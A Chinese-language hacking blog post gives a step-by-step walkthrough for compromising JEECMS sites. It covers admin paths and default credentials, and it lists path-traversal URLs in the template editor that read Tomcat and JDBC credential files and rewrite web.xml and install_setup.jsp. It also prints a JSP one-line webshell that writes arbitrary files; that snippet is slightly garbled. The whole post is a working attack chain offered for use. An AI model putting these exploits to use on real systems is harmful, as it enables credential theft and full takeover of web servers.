JEECMS編輯漏洞及隨便拿webshell,啊哈哈

JEECMS是基於java技術開發,繼承其強大、穩定、安全、高效、跨平臺等多方面的優點 · 採用SpringMVC3+Spring3+Hibernate3+Freemarker主流技術架構 安全性做得非常變態,當網站安裝完成後就不再允許執行任何目錄下的jsp文件了(web.xml配置了過濾器禁止了很多種動態腳本)。



2.x後臺:
login/Jeecms.do
3.x後臺:
jeeadmin/jeecms/index.do

默認賬戶:admin
默認密碼:password

獲取tomcat密碼:
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml

獲取JDBC數據庫賬號密碼:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties

ad84eb6855fbb2fb081c4fa04f4a20a44623dc39

JEECMS2.x版讀取路徑:
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties

e4528546fbf2b211e9c391fcca8065380dd78e07


修改web.xml取消對jsp的過濾:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml

8fa1dc43f21fbe09317ed4a66b600c338644add4

JEECMS2.x版讀取路徑:
admin/core/template/Com_edit.do?relPath=\../../../web.xml

a19164fe43166d2202690226462309f79152d2d2

修改install/install_setup.jsp:
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp

3236c63d5343fbf2ca4bb191b07eca8064388f89
JEECMS2.x版讀取路徑:
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp

55e151d3277f9e2f2b540aba1f30e924b999f38b


插入Jsp一句話:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("

("f"))).write(request.getParameter("t").getBytes());
%>

修改後的一句話目錄
/install/install_setup.jsp

一句話連接成功後的jsp大馬目錄:
/ma.jsp


0f877d61034f78f0fc518d4179310a55b2191c9d


注:

1:2.X 在後臺可以上傳媒體格式爲jsp的文件

2:web.xml修改後需要重啓服務器(自動加載更新的除外)
3:本文由 李聽Hack 原創,轉載請留名。


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章